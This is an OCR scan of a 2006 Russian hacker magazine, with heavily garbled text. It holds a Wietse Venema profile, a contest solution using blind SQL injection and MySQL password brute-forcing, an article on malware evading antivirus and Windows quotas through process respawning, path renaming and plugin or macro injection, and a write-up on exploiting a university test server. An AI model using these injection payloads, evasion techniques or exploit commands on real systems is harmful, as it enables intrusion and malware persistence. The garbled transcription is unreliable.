подобные вопросы решались в канале #зегѵісез. Если твоя сеть была 
использована при проведении атаки, или один из юзеров успел попить 
крови администрации, то добиться полного снятия бана будет сложно. 
Логичнее окажется просить о выписке исключения по твоему адресу, 
если он является статическим. Понятно, что для проведения судьбонос- 
ного разговора надо будет воспользоваться незасвеченным хостом. 
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РРОРИЕ 



«Программ без багов не существу- 
ет. Приложив немного усилий, я 
могу свести их соотношение к ко- 
личеству строк в своих программах 
(к 1 : 1 000 ) . Но, так как Розшх имеет 
50 тысяч строк кода, комментарии, 
думаю, излишни» . 



ІТЬ 



'О 



«Меня много разспрашивали, есть ли баги 
в ТСР ѴѴгаррег, поскольку он долгое время 
не обновлялся. Я всегда отвечаю, что 
известных багов нет, и именно поэтому нет 
обновлений». 



ТСР №аррег и другие проекты Витсе I 



Краткая биография 

Родился в 1951-м году в Дании. Задолго до школы научился писать и читать, и значитель- 
ную часть своего детства проводил за чтением. После окончания школы поступил в универ- 
ситет Г ронингена, где изучал физику и получил докторскую степень. Затем стал работать 
системным архитектором на факультете математики и компьютерных наук университета 
Эйндховер. 8 из 12-ти лет, проведенных там, Витсе занимался написанием утилит для авто- 
матической трансляции ЕЭІ (ЕІесігопіс Эаіа ІпіегсИапде) сообщений. Его программы взаимо- 
действовали с самыми разными устройствами, и любые неполадки железа могли привести 
к сбою софта. Приходилось учитывать каждую мелочь, что дало большой опыт написания 
максимально безопасного кода. В 1 996-м году иммигрировал в США и поступил на работу в 
Исследовательский центр ІВМ им. Томаса Ватсона, где работает по сей день. 



Розіііх 

Почтовая система, которая принесла Венеме известность и заду- 
мывалась как альтернатива популярному ЗепсІтаіГу. Витсе сделал 
ее максимально похожей наЗепбтаіІ снаружи, но внутри это была 
совершенно другая программа, более быстрая, гибкая и безопас- 
ная. Первоначально система получила название ѴМаіІег и была 
впервые представлена ІВМ широкой публике в 1998-м году, но за- 
тем ее переименовали в РозІІіх. 

ЗАТАИ 

ТНеЗесигіІуАбтіпізІгаІогТооІІогАпаІугіпдЫеІѵѵогкз — нашумевшая 
программа, написанная в соавторстве с Дэном Фармером. Предна- 
значалась для автоматического сбора информации об удаленной 
системе. ЗАТАИ позиционировался как удобный инструмент для 
админов, но сразу после релиза поступил на вооружение хакеров 
всех мастей. Это был первый сетевой сканер с удобным пользова- 
тельским интерфейсом, и в 1 993-м году, когдаон впервые появился 
в Интернете, считался лучшей утилитой такого рода. 



ТНе Согопег'8 Тооікіі 

(ТОТ) — еще один плод сотрудничества Венемы с Фармером. 
ТОТ — это подборка полезных программ для анализа ІЛМІХ-систе- 
мы после взлома. Впервые была представлена в августе 1999-го 
года на семинаре Методов сбора компьютерных улик. 

Рогітар 

Рогітаррег имеет контроль доступа, усложняющий хакерам атаки 
на ВРС-демоны. 

ТСР ѴѴгаррег 

Небольшая утилита, исполняющая функции файрвола для ІІІМІХ 
(мониторинг входящих пакетов, проверка прав доступа и т. д.) 

Витсе написал также несколько зесигііу-документов, получивших 
широкую известность: «Закон Мерфи в компьютерной безопас- 
ности» или написанная в соавторстве с Деном Фармером статья 
«Повышаем безопасность сайта путем его взлома» . 
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«Нельзя сделать систему защищенной, 
залатывая дыры. Если она изначально не 
была построена как защищенная, она ни- 
когда таковой не станет». 



Хобби 

В свободное время 
предпочитает 
совершать пешие 
и велосипедные 
прогулки по жи- 
вописным местам 
Нью-Йорка вместе 
со своей женой 
Анитой. 



Награды 

Доктор Витое 
Венема получил 
несколько престиж- 
ных наград за свой 
выдающийся вклад 
в развитие ІІЫІХ-и 
открытых систем. 



Среди них: 
ЗесигіІуЗиттіІ 
НаІІоІ Рате АѵѵагсІ, 
ЗАСЕОиІзІапсІіпд 
Ас И іеѵе теп! АѵѵагсІ, 
ЫШ II О АѵѵагсІ. 



Иллюстратор Родион Китаев 



«Главная трудность 
софтварного разработ- 
чика- улучшить про- 
грамму, при этом не 
создавая лишних про- 
блем» 



Чем занимается сейчас 

После того как в 2002-м году Витое Венема 
оставил пост руководителя РІВЗТ — Меж- 
дународной ассоциации зесигііу-ограни- 
заций — он стал уделять больше времени 
программированию в Исследовательском 
центре ІВМ. 

В 2004-м году Витое в соавторстве с Дэ- 
ном Фармером написал книгу «Раскрытие 
улик», в которой рассказывается о том, 
как изучить свою систему, подвергшуюся 
взлому, и как обнаружить доказательства 
пребывания в ней хакера и по возможности 
выследить его. На данный момент Витое Ве- 
нема считается одним из лучших в мире экс- 
пертов по компьютерной безопасности. 
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Х-Конкурс /#05 2006 

В последнем конкурсе перед тобой стояла серь- 
езная задача: нужно было исправить неудачи 
сборной России по футболу и вставить ее в 
сетку соревнований вместо бразильцев. С тем, 
как нужно было осуществлять мечту болельщи- 
ка, мы разберемся прямо сейчас. 
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На сайте копкигз.хакер.ги была размещена 
таблица со статистикой. Открыв страницу с 
информацией о команде, ты бы увидел, что 
скрипту іпбех.рИр передаются три параметра: 
іпІ=з1:а1:&ісІ=21&сІо=герогБ Интуитивно, самая 
интересная переменная — і<± В самом деле, 
если поставить іб=2Т, то появится сообщение 
об ошибке: 

«ІЫСОВЯЕСТ ОБІЕЯѴ». Ну вот, это уже 
кое-что. Экспериментируем дальше: іпбех. 
рИр?іпІ=зіаі&ісІ=21+АІ\Ю 1=1. Ответ положи- 
тельный — страница с информацией о бра- 
зильской сборной показывается без ошибок. 



32 гсшз іп зеЦ (0.11 зес) 



Однако стоит включить в запрос кавычки, как 
нас тут же ожидает облом — параметр тадіс_ 
циоІез_дрс включен. Однако нас это не остано- 
вит. Первым делом неплохо было бы получить 
имя МуЗОІ_-пользователя, под которым работа- 
ет наш скрипт. Поскольку у нас фильтруются 
кавычки и нет доступа к таблице МуЗОІ_.изег, 
мы будем использовать технику посимвольного 
перебора. 

Работает этот метод следующим образом. К 
выполняемому запросу добавляется «АІ\Ю 
азсіі(Іоѵѵег(зиЬзІгіпд(изег(),порядковый_номер_ 
символа, 1)))=сИаг(код_символа)». Это позво- 
ляет, последовательно меняя АЗСІІ-коды, доби- 
ваться ситуации, при которой запрос успешно 
выполняется. Это означает, что указанный 
АЗСІІ код совпадает с кодом символа логина, и 
можно переходить к следующей позиции. Чтобы 
подобрать первый символ имени пользователя, 
нужно использовать следующий запрос: 

іпбех.рИр?іп1=зІаІ&іб=21%20АЫО%20азсіі(Іоѵѵег( 
зиЬзІгіпд(изег(),1 , 1 )))=[АЗСІІ] 

Здесь [АЗСІІ] — перебираемый символ, кото- 
рый последовательно меняется, пока не будет 
достигнуто совпадение. Для перебора малень- 
ких латинских букв нужно менять параметр 
[АЗСІІ] от 97 до 122. Скрипт для автоматизации 
процесса можно взять с ИДрѴ/гзБѵоісІ.ги/рарегз/ 
тѵзді сбаг ЬтІеЧхі . Запускаем сценарий и 
получаем имя пользователя: «копкигз». Дело 
осталось за малым — пробрутить пароль! 

Берем любой словарь паролей и пускаем брутер: 

~ $ ./г57туздІ_ЬгиІе -И копкигз.хакер.ги -р 3306 -I 
копкигз -ѵѵ раззѵѵогб.ізі: 

[ ЭОІЧЕ ] Раззѵѵогб Іоипб! 

Раззѵѵогб: РооіЬаІІ 

НЕХ: 46 6Р6Р74 62 61 6С 6С 

Вот такие дела! Теперь настало время изменить 
таблицу и закончить нашу миссию: 

~ $ тузці -И копкигз.хакер.ги -и копкигз -р 
Епіег раззѵѵогсі :****** 

Командой зііоѵѵ баіаЬазез легко выяснить, что 
всего на сервере 2 базы данных: бЬ_копкигз и 
МуЗОБ. Нас, конечно, инересует бЬ_копкигз: 

тузцЬ изе бЬ_копкигз 

В этой базе данных расположена единственная 
таблица — сНатр, в которой и располагается 
таблица с командами. Сделав ЗЕБЕСТ * Ігот 
'сИатр', можно легко получить все содержи- 
мое таблицы: 
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После этого самое время заменить Бразилию российской 
командой, для чего нужно было выполнить несложный 
запрос: ирбаіе 'сИатр' зеі Іеат=«Виззіа» ѵѵИеге іб=21 . 



В этом месяце у нас три победителя, два из которых 
реально глючные: діик, діискгеаі и наш старый знакомый 
КЗІІВі, который проходит конкурс уже не в первый раз. 
Всем презентуем по подписке на любимый журнал. 

А тебе предлагаем 20-го мая зайти на копкигз.хакер.ш 
и поучаствовать в новом конкурсе. 



а 



О 






КРИС КАСПЕРСКИ 



Взлом / 01 

Жизнь и смерть 
беспозвоночных 
в системе 

Выживание в системах с жестоким квотированием 

Время глобальных вирусных эпидемий 
давно прошло, и большинство червей сей- 
час гибнет еще на излете, даже локальные 
вспышки удается зажечь лишь немногим. . . 



Давай попробуем разобраться, что мешает вирусам распростра- 
няться и заодно обсудим новые вирусные концепции, адаптирован- 
ные к суровым условиям современной жизни. 

Как же раньше было хорошо... 

Вплоть до появления ѴѴ2К пользователи ѴѴіпбоѵѵз даже не знали, 
что существует такая штука, называемая «квотированием» ресур- 
сов. Каждый процесс получал в свое распоряжение 4 Гб адресно- 
го пространства (из которых реально можно было использовать 
только полтора). Подсистема безопасности разграничивала до- 
ступ к файлам, запрещала вызывать некоторые АРІ-функции и 
т. д., но никаких других ограничений не налагалось. Любой про- 
цесс, даже обладающий гостевыми правами, мог забить весь 
диск целиком, создать максимальное количество окон и сожрать 
всю оперативную память. Единственное, что мог предпринять ад- 
министратор, — нажать ВЕЗЕТ, надеясь на то, что неожиданная 
перезагрузка не превратит дисковый том в труху. В ѴѴ2К (с боль- 
шим опозданием против ІІЫІХ) наконец-то появилась поддержка 
дисковых квот, определяющих максимальный размер доступного 
дискового пространства для каждого из пользователей. Вслед за 
этим ХР ЗР2 ограничила количество ТСР/ІР-соединений в едини- 
цу времени для каждого из процессов, что по идее должно было 
предотвратить «заторы» в Сети, вызванные вспышками вирусных 
эпидемий. 

В настоящее же время МісгозоІІ бьется над созданием систе- 
мы, которая загружается с Веаб-Опіу носителей (ЕІЫІХ это умеет), 
и, когда это будет сделано, возможность модификации испол- 
няемых файлов исчезнет (правда, вирусы по-прежнему смогут 
внедряться в память и командные файлы, создаваемые админис- 
тратором). 

Возможности квотирования практически никем не использу- 
ются (многие о них даже не подозревают), но будущее надвига- 
ется на нас с разрушительной силой. Очередной конец вирусам? 
Или, может быть, наступает волнующий момент перерождения 
вирусов, когда в результате борьбы за существование они вы- 
нуждены научиться паразитировать на программах, как это дела- 
ют настоящие биологические вирусы, или сойти с арены, попол- 
нив свалку истории новыми строками кода. 



Каждому пользователю по квоте! 

Механизмы квотирования, реализованные в ѴѴіпбоѵѵз, затрагивают 
все аспекты жизнедеятельности системы и прежде, чем расчехлять 
свой хвост, это хозяйство надо как-то классифицировать. В первую 
группу попадают квоты, «привязанные» к отдельно взятому про- 
цессу, а точнее его РЮ. Система позволяет отслеживать и ограни- 
чивать общее время «жизни» процесса, количество затраченного 
процессорного времени (как на прикладном уровне, так и в режиме 
ядра), число операций ввода/вывода (то есть прочитанных/запи- 
санных байт), объем затребованной (реально выделенной) памяти 
и т.д. Остальные параметры можно узнать из «Диспетчера Задач» . 
Пока еще І\ІТ не умеет квотировать память и объем ввода/вывода, 
но это несложно реализовать путем перехвата базовых паііѵе-АРІ 
функций, чем уже занимаются некоторые антивирусные програм- 
мы и персональные брандмауэры. ѴѴіпсІоѵѵз наконец-то начинает 
приобретать черты многопользовательской системы, что несет в 
себе как преимущества, так и угрозу для существования вирусов. 
Кто-то может возвразить, что І\ІТ была многопользовательской с 
самого начала. Ну и в чем же это реально проявлялось? В системе 
может находиться только один пользователь (запуск программ от 
имени другого пользователя не в счет), и прежде чем создать новый 
сеанс, предыдущий должен быть завершен. 

Хуже того, пользователи не могут устанавливать приложения 
в «свои» домашние папки, и многопользовательский доступ ог- 
раничивается одним лишь разграничением доступа к данным и 
индивидуальным настройкам (каждому пользователю — свой 
НКЕѴ^ІІРРЕІ\ІТ_ІІ5ЕРі)! А вот в ІІІЧІХ кто угодно может себе поз- 
волить установить свою собственную версию системных библио- 
тек и программ, доступную только ему и никак не влияющую на ос- 
тальную часть системы! Допустим, Машахочет работать с ѴѴогб 97, 
Ира — с ѴѴогб 2000, а Марине подавай только ѴѴогб ХР. Что может 
сделать администратор?! Да ничего! Либо долго плясать с бубном, 
устанавливая утилиты от сторонних разработчиков, либо всерьез 
задуматься о том, сколько пользователей реально может выдер- 
жать І\ІТ. Многие компании, предоставляющие услуги хостинга или 
торгующие процессорным временем кластерной системы, активно 
используют механизмы квотирования, без которых данная затея 
лишена всякого смысла. 
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Почитай о документированных функциях 
УУІПСІОѴѴ5 АРІ: 

ѵѵѵѵѵѵ.тзсіп.сот 

И почитай о недокументированных: 

ѵѵѵѵѵѵ.ѵѵазт.ги 



Нѳ забывай, что вся привѳдѳнная инфор- 
мация прѳдназначѳна только для ознаком- 
ления и нѳ является призывом к действию. 



Как размножаются ежики, или как образуются «зомби» 

Квоты, привязанные к РЮ’у, легко обойти. Достаточно периоди- 
чески (например, один раз в минуту или даже секунду!) порождать 
новый процесс, термируя предыдущий. Новорожденный процесс 
получает полную порцию свежей квоты, а когда она иссякает, трюк 
с «перерождением» повторяется вновь. Это очень древний прием, 
используемый самим Червем Морриса, но известный задолго до 
него. Конечно, подобная «активность» является ненормальным яв- 
лением, притягивающим внимание персональных брандмауэров и 
антивирусов, но этих простофиль легко обхитрить. 

Свой запуск антивирус начинает с проверки памяти. Он получа- 
ет список активных процессов, тщательно проверяя каждый из них 
на вшивость. Легальными средствами список процессов можно 
получить с помощью функций ТООІ_НЕ1_Р32, экспортируемых биб- 
лиотекой КЕРІ\ІЕІ_32.ЭІ_І_, которую перехватывают многие вирусы, 
не желающие быть замеченными. Сама по себе техника перехвата 
предельно проста и к тому же описана в куче хакерских статей , так 
что не будем на ней останавливаться, тем более что существует 
другой источник информации — недокументированная функция 
ЫЮиегуІпІогтаІіопРгосезз, экспортируемая МТ0І_І_.01_1_, но фак- 
тически реализованная в І\ІТОЗКПІ\ІІ_.ЕХЕ, и перехватить ее «пря- 
мой» вызов уже труднее. Без знания ассемблера и умения писать 



драйвера тут уже не обойтись, но, к счастью, существуют и другие 
пути , работающие на всех операционных системах и не требующие 
напряжения мозговых извилин. Проведем простой эксперимент. 
Запустим РАР (если он только не был запущен ранее), нажмем 
<Р11> и в списке плагинов найдем «Ргосезз Іізі», вываливающий 
список процессов в текущую панель. Для получения более подроб- 
ной информации о процессе подводим к нему курсор и давим <РЗ> 
или <Р4>. «Ага», — говорим мы голосом Тигры, неожиданно обна- 
ружившего у себя под хвостом непочатую банку пива. Вот оно! Азз 
оі іИе Эгадоп! Имя процесса, путь к исполняемому файлу, РЮ ма- 
теринского процесса, время запуска и прочая информация перед 
глазами. Полный путь — это нехорошо. Любой пользователь (анти- 
вирус) может считать файл с диска и посмотреть, что это за зараза 
такая! Как бы его преодолеть? В смысле изменить истинный путь 
на что-нибудь другое?Увы! Легальными средствами с прикладного 
уровня до этой информации не дотянуться (как минимум, потребу- 
ется заполучить права администратора). В довершение ко всему 
[\ІТ блокирует исполняемый файл вплоть до его завершения — ко- 
манда ЭеІеіеРіІе возвращает еггог, и мечту создать временный файл, 
автоматически удаляющий себя после запуска, реализовать невоз- 
можно . И вот на сцене появляется мыщъх. Весь в сером. Стесни- 
тельно покусывая кончик хвоста, он говорит: «ЫТ блокирует только 
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/1/ Макросы 

РАР хранит свои макросы в реестре 
— доступен каждой программе 

Гс Выбор столбцов для отображения 

процессорные ресурсы, отслеживае- 
мые І\ІТ 
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удаление и запись в файл, но допускает гепате. Причем может быть 
переименован не только сам файл, но и путь к нему, пускай и ценой 
побочных эффектов разной степени тяжести » . 

Что это за эффекты такие? Давайте посмотрим! Создаем ка- 
талог «0:\1\2\3\», кладем в него поіерасі.ехе (или любую другую 
программу по вкусу) и запускаем ее. Теперь переименовываем 
«1 » в «а». Угадайте, что мы получим? Наперекор всяким переиме- 
нованиям каталог «0:\1\2\3\» как был, так и остался, но теперь он 
совсем пустой! Зато образовался каталог «0:\А\2\3\» с поіерасі’ом 
внутри. Здорово! Переименуем поіерасі.ехе в ххх.ехе. Как видим, 
он совсем не сопротивляется и успешно переименовывается. Ана- 
логичным путем могут быть переименованы каталоги «2» и «3». 
Единственное, что мы не можем делать, — это менять диск, но нам 
этого и не нужно! Главное, что запущенный из «0:\1\2\3\по1ерасІ. 
ехе» файл переместился в «0:\а\2\3\ххх.ехе», то есть поменял не 
только имя, но и место жительства. А что на счет списка процес- 
сов? Так вот, знайте, что І\ІТ создает его лишь однажды — в момент 
запуска процесса — и никогда не обновляет. 

Т о есть в нашем случае РАР (равно как и любая другая программа) 
«честно» показывает исходный путь, которого уже нет. 



МосЫе: 
РиІІ раІГі: 
РЮ: 

РагепіРЮ: 

Ргіогііу: 

ТИгеасІз: 



N ОТЕР Ай. ЕХЕ 

0 :\1 \2\ЗМ\І ОТЕР АО . ЕХЕ 
664 

716 (Раг.ехе) 

8 

1 



Антивирус просто не сможет открыть файл «0:\1\2\3\І\ЮТЕРА0. 
ЕХЕ». Как говорится, кто не успел, тот опоздал. Теоретически (и 
практически) антивирус может «подключиться» к процессу через 
его РЮ, но этому легко противостоять. Достаточно распотрошить 
любой хороший упаковщик типа АгтасІіІІо или еХігете Ргоіесіог — 
они сопротивляются этому вовсю! (Как вариант, можно положить 
на прежний путь безобидный файл с тем же самым именем — вот 
тогда доверчивый антивирус обломается по полной программе, 
даже не подозревая, как круто мы его провели). 

Резидентные мониторытаким образом обойти уже не получится. 
Они перехватывают АРІ-функции, отвечающие за чтение файлов 
и запуск процессов (как правило, это СгеаіеРіІе и СгеаІеРгосезз), 
прогоняя программу через анализатор до ее запуска. Несколько 
лет назад мыщъх опубликовал в «Хакере» статью «Техника выжи- 



вания в мутной воде, или как обуть антивирус» (в журнале она на- 
зывалась "Секреты маскировки"), описывающую ряд элегантных 
и эффективных приемов, обламывающих антивирус со всеми его 
эвристическими анализаторами. Тогда было достаточно упаковать 
программу каким-нибудь навесным упаковщиком, а в точку входа 
вставить іитр на свой іНипк, использующий самомодифицирую- 
щийся код, структурные исключения или новомодные ЗЗЕ-коман- 
ды, после чего восстанавливающий оригинальное содержимое, 
затертое фтр’ом, и передающий распаковщику бразды правле- 
ния. Но виртуальные машины антивирусных систем за последнее 
время значительно окрепли, и часть этих трюков уже перестала 
работать, а скоро они перестанут работать совсем ! Что же делать? 
Без паники, парни! Не торопитесь высаживаться на измену, а луч- 
ше повращайте хвостом и подумайте головой. 

Самое простое — воткнуть в іИипк функцию ЗеГГітег/ЗІеер, вызы- 
вающую оригинальную точку входа через несколько секунд. Ни 
один из известных мыщъх’у антивирусов не анализирует аргумен- 
ты ЗеГПтег и не ждет так долго. С его точки зрения, программа 
выглядит так: 

ЗеГПтег(,,,); 

31еер(,); 

ЕхіІ(,); 




/3/ Специальный плагин 

позволяет РАР’у следить за процессами 
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/4 1 Диспетчер задач 

использует недокументированную фун- 
кцию ЫЮиегуІпТогтаІіопРгосезз 



Сочетание команд, конечно, удивительное, но, с точки зрения ма- 
шинной логики, вполне «законное». А еще можно использовать 
Асинхронные Вызовы Процедур (АРС), создаваемые АРІ-функцией 
ОиеиеІІзегАРС. Да много всего можно придумать! Но мы ведь сов- 
сем не об этом говорим! Вернемся к нашим идентификаторам ро- 
дительских процессов (рагепі РЮ). Это настоящий кладезь инфор- 
мации для антивирусов и продвинутых пользователей. Возьмем, к 
примеру, утилиту Иізі из комплекта МісгозоЙ Зиррогі Тооіз и запус- 
тим ее с ключом «-1», а еще лучше воспользуемся ЫТ Ехріогег’ом 
Марка Руссиновичка, бесплатную копию которого можно скачать с 
ѵѵѵѵѵѵ.зѵзіпІетаІз.сот/ЦііІШез/РгосеззЕхрІогег . НітІ. Иерархия про- 
цессов видна как на ладони ! А если материнский процесс уже за- 
вершился, и рагепі РЮ указывает в никуда? Тогда образуется про- 
цесс «зомби», сразу же привлекающий ксебе внимание, особенно 
если этот процесс периодически порождает новых «зомби » , а сам 
исчезает. Увы! Это ограничение данной техники! Впрочем, как по- 
казывает практика, они все-таки таковыми и остаются, особенно 
если размножаются по-хитрому, выдерживая перед завершени- 
ем процесса небольшую паузу. Тогда в системе будут постоянно 
присутствовать ровно два «зомби» с одинаковыми именами, хотя 
путем перекрестного «опыления» можно создать двух разноимен- 
ных «зомби», попеременно вызывающих друг друга, с постоянно 



изменяющимися РЮ’ами. Но не все пользователи обращают вни- 
мание на РЮ’ы. В процессе практической реализации этой схемы 
программист неизбежно сталкивается с проблемой передачи дан- 
ных от одного процесса к другому. Как ее осуществить? Есть очень 
изящный трюк, позволяющий прерывать выполнение процесса в 
любое время (например, при антивирусной угрозе), возобновляя 
работупорожденного «зомби» стогоже самого места. Это просто! 
Все переменные процесса хранятся в разделяемой области памя- 
ти, туда же перед завершением записывается и регистровый кон- 
текст. Его чтение осуществляется функцией ѲеШігеасІСопІехІ, а 
запись — ЗеГПтгеасІСопІехІ. Естественно, контекст каждого потока 
должен сохраняться отдельно. Порожденный процесс считывает 
контекст своего предка из сохраненной области памяти и устанав- 
ливает его вручную с помощью несложной ассемблерной вставки. 
Таким образом, с точки зрения хакера, разрабатывающего зло- 
бный вирус, нет никакой разницы, сколько процессов участвует 
в схеме. Переключение происходит совершенно «прозрачно», и, 
если в довершение ко всему процесс-потомок наследует дескрип- 
торы всех объектов своего родителя, программа выполняется так, 
как будто бы никаких переключений не происходит. Вот только 
квоты постоянно обновляются, подкидывая свежие охапки дров в 
пылающий огонь! 




Почтовый червь 
МуБооМ 



М5ВБА5Т — люби- 
КРСБСОМ 



СоаеКеа 
115 Гискег 
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/5 ѴѴгіІеРгосеззМетогу 

в действительности представ- 
ляет собой «обертку» вокруг 
2\л/РгоІесІѴігІиаІМетогу 

Іі Ехріогег Мака Руссиновичка 

отображает иерархию процессов 
и выслеживает «процессы-зомби» 




Захват чужих ресурсов 

Вот мы и подошли к паразитам вплотную. Вместо того чтобы пло- 
дить «зомби», рискуя быть обнаруженным и создавая никому не- 
нужную активность, напрягающую систему, не лучше ли тайком 
внедриться в чужую программу, используя ее ресурсы как свои 
собственные? Великолепная идея, вот только... любой известный 
механизм внедрения легко распознается антивирусами и персо- 
нальными брандмауэрами. 

И нам, чтобы выжить, необходимо предложить радикально 
новый способ, который не удастся проконтролировать никому. 
Большинство вирусов внедряет свой код посредством функции 
ѴѴгііеРгосеззМетогу, которую контролируют всякие сторожа. А как 
они могут ее контролировать? Обычно используется простой при- 
мер: правится (в памяти) таблица экспорта КЕЛІ\ІЕІ_32.0!_І_так, что- 
бы ѴѴгіІеРгосеззМетогу указывал на антивирусную насадку, про- 
веряющую, кто и зачем эту функцию вызывает. В других случаях 
правится непосредственно сам код функции ѴѴгіІеРгосеззМетогу 
(например, в ее начало ставится фтр на антивирусный іііипк). Ко- 
роче, вызывать ѴѴгіІеРгосеззМетогу может только самоубийца, 
тем более что ѴѴгіІеРгосеззМетогу — это только «обертка» вок- 
руг 2ѵѵРгоІесІѴігІиаІМетогу, экспортируемой І\ІТОЦ_.ОЦ_, которую 
контролирует значительно меньшее количество антивирусов/ 
брандмауэров. В свою очередь, 2ѵѵРгоіесІѴігШаІМетогу обраща- 
ется непосредственно к ядру операционной системы через пре- 
рывание іпі 2ЕИ со значением 77И в регистре ЕАХ (начиная с ХР, 
интерфейс взаимодействия с ядром осуществляется через специ- 
альную машинную команду зузіеп^ег, но прерывание ІІ\ІТ 2ЕИ по- 
прежнему поддерживается и работает в целях сохранения обрат- 
ной совместимости). 



4ехІ:77Р82С30 2\л/РгоІесіѴіПиаІМетогу ргос пеаг 
ЛехІ:77Р82С30 агд_0 = бѵѵогсі ріг 4 

ЛехІ:77Р82С30 

ЛехІ:77Р82С30 тоѵеах, ~П\\ ; ЫіРгоІесіѴіПиаІМетогу 

ЛехР77Р82С35 Іеа ебх, [езр+агд_0] 

ЛехІ:77Р82С39 ігЛ 2ЕІп 

ЛехІ:77Р82СЗВ геіп 14И 

ЛехІ:77Р82СЗВ 2ѵѵРгоІесіѴігІиаІМетогу епф 



РІемногие сторожевые программы работают на таком низком 
уровне, поэтому мы имеем хорошие шансы остаться незамеченны- 
ми, однако... риск все-таки есть. Что поделаешь — такова специ- 
фика нашей профессии. Ріо глубже спускаться уже некуда! РІиже 
только ядро! Можно, конечно, написать драйвер, разбирающий 
каталог страниц и внедряющий код напрямую в физическую па- 



мять, или сделать то же самое с прикладного уровня, обратившись 
к псевдоустройству «ЮеѵісеАРИузісаІМетогу», которое вплоть до 
ѴѴіпсІоѵѵз 2003 Зегѵег ЗР1 было доступно администратору на чте- 
ние/запись, но теперь работать с ним не может даже Зузіет, отбра- 
сывая нас назад к драйверу (см. статью СИапдез Іо Рипсііопаіііу іп 
МісгозоЙѴѴіпсІо\л/зЗегѵег20033егѵісеРаск1 ОеѵісеХРИузісаІМетогу 
ОЬіесІ на сайте МісгозоЙ: ѵѵѵѵѵѵ.тісгозоіі.сот/іесііпеі/ргосііесііпоі/ 
ѵѵіпсІоѵѵззегѵег2003/ІіЬгагѵ/ВоокоІЗР1 /еОІ862аЗ-сІ1 6-4а48-Ьеа5- 
1200401 2се35.тзрх ). Другая сумасшедшая идея — спуститься на 
секторный уровень, забраться в файл подкачки и слегка «подпра- 
вить» программу. Но ведь это же бред! Существуют гораздо более 
элегантные и незаметные способы безопасного внедрения! 

Наши методы 

Нам ведь все равно, в какую программу внедряться, правда? Мы 
чужие ресурсы ограбить хотим. Многие программы поддерживают 
плагины и другие виды расширений. Достаточно забросить модуль 
в определенную директорию или слегка подправить конфигура- 
ционный файл (реестр). Программа загрузит наш плагин как род- 
ной, и мы окажемся в чужом адресном пространстве, в пределах 
которого можно делать все что угодно. Другое могучее орудие 
пролетариата — макросы. РАБ хранит их в реестре и позволяет 
переназначить любую комбинацию клавиш, даже уже занятую. 
Также он позволяет макросам подавлять вывод на экран. Что это 
значит? А вот что! Возьмем комбинацию, которая используется как 
можно чаще (например <АІ1>+<Р1 >, отвечающая за выбор диска 
в левой панели) и повесим на нее последовательность э. . . некото- 
рых «полезных» действий (необязательно деструктивных), а после 
этого нажмем <АІЬ>+<Р1> для вызова настоящей панели, чтобы у 
пользователя не возникло никаких подозрений, что здесь что-то не 
так. Поскольку РАР предоставляет доступ ко всем командам коман- 
дной строки, возможности макровирусов оказываются поистине 
безграничными! Обнаружить присутствие посторонних макросов 
очень сложно, разве только специально их искать, но для этого 
потребуется установить дополнительный плагин, отображающий 
макрокоманды в «естественном» виде, иначе в них сам мыщъх 
хвост оторвет. А знаменитый Лис? Да это целое кладбище для ха- 
керов готического типа! Бери и хакерствуй , в смысле устанавливай 
свои собственные расширения. «Левые» расширения легко обна- 
ружить просто просмотрев перечень уже установленных, однако 
далеко не всякий пользователь с уверенностью сможет сказать, 
какие расширения он устанавливал и когда. Последние версии 
Оперы также поддерживают расширения в виде мини-приложе- 
ний, которые никем не контролируются, □с 
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СѴВЕВАІЧТ 

/ 8АТКЖ@ѴА№ЕХ.ПІІ / 



Взлом і 

Зачет! 

Ломаем институтскую систему тестирования 




Лысый препод 

Есть у меня в институте колоритный персонаж — лысый, как 
футбольный мяч, преподаватель Петр Алексеевич. Поговарива- 
ют, что еще в далеком 1967-м году, сразу после старта ракеты 
Буран-18, он сошел с ума: начал беспричинно улыбаться (ракета 
упала через 3 минуты), везде ходил с бадминтонной ракеткой 
и розовым воланчиком. В общем, появились в его поведении 
странности. Однако недавно он удивил студентов не на шутку: 
отложил ракетку в сторонку и занялся внедрением высоких 
технологий в виде компьютерной тестирующей системы для про- 
верки знаний. Честно говоря, знаний по его предмету у меня не 
особенно-то много было. Поэтому я решил подойти к процессу 
тестирования с хакерской стороны: нужно было просто поломать 
его систему. 

Осмотр пациента 

На консультации я заметил, что для запуска системы тестирования 
препод на каждом компе вбивал в какое-то клиентское окошко ІР 



10.2.100.2, а потом жал кнопочку «Подключиться». Стало понятно, 
что на них установлена клиентская часть системы, в которой мож- 
но было выбрать свои Ф.И.О. и группу, но вопросы, видимо, загру- 
жались по сети с сервера, ІР которого 10.2.100.2. На нем, скорее 
всего, и стояла серверная часть всей системы. Задача свелась к 
банальному взлому сервака с указанным выше ІР-адресом. 

Засев за комп в одной из компьютерных лабораторий, я начал 
изучение жертвы. Хотелось по привычке использовать всеми лю- 
бимый птар, но, к сожалению, этого сканера у меня на флешке 
не оказалось, зато нашлась небольшая программка ѵѵіпііпдегргіпі. 
Онаспособнаопределить ОЗ наудаленной тачке и показать откры- 
тые порты. После скана ѵѵіпііпдегргіпі: показала следующее: 

ІР Асісігезз: 10.2.1 00.2 Р-Е80529А1 75954 
Сотриіегпате: М30Р0иР\Р-Е80529А1 75954 
ЗЮ: 3-1-5-21 -1060284298-507921405-8395221 1 5 
РаІсН І_еѵеІ: 

Орегаііпд Зузіет: 5.1 
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Май — жестокий месяц. С одной стороны, уже светит 



жаркое солнце, и длинноногие красавицы сексуально 
облизывают мороженное, жадно посматривая в твою 
сторону. С другой — лысоватый преподава 










пит с зачетом по своему угрюмому предмету,, л полков- 
ник Петренко из военкомата не спешит завершать ве- 
сенний призыв. Нет причин для беспокойства, амиш. 
Все разрулим! 



Роіе 

Роіе 

Роіе 

Роіе 

Роіе 



ІМТѴѴогкзІаІіоп 
І_АІ\І МападегѴѴогкзІаІіоп 
І_АЫ МападегЗегѵег 
Роіепііаі Вгоѵѵзег 
Васкир Вгоѵѵзег 



С:\>НОО-плз0401 1-Ізазгѵ-ехрІ.ехеО 10.2.100.2 3333 
Кратко опишу используемые параметры. 0 — тип цели (в нашем 
случае — ѴѴіпХр+5р1). 10.2.100.2 — ІР цели. 3333 — <Ыпф 011 >. 
Сплоит выполнился успешно, и появилось сообщение: 



Кроме этого, натачке было открыто множество портов, в том числе 
и обычно не используемые стандартными приложениями. Склады- 
валось впечатление, что о безопасности сервера никто не беспо- 
коился и вряд ли проводил систематическое обновление софта 
(что типично для универов). Как видно из лога скана, на сервере 
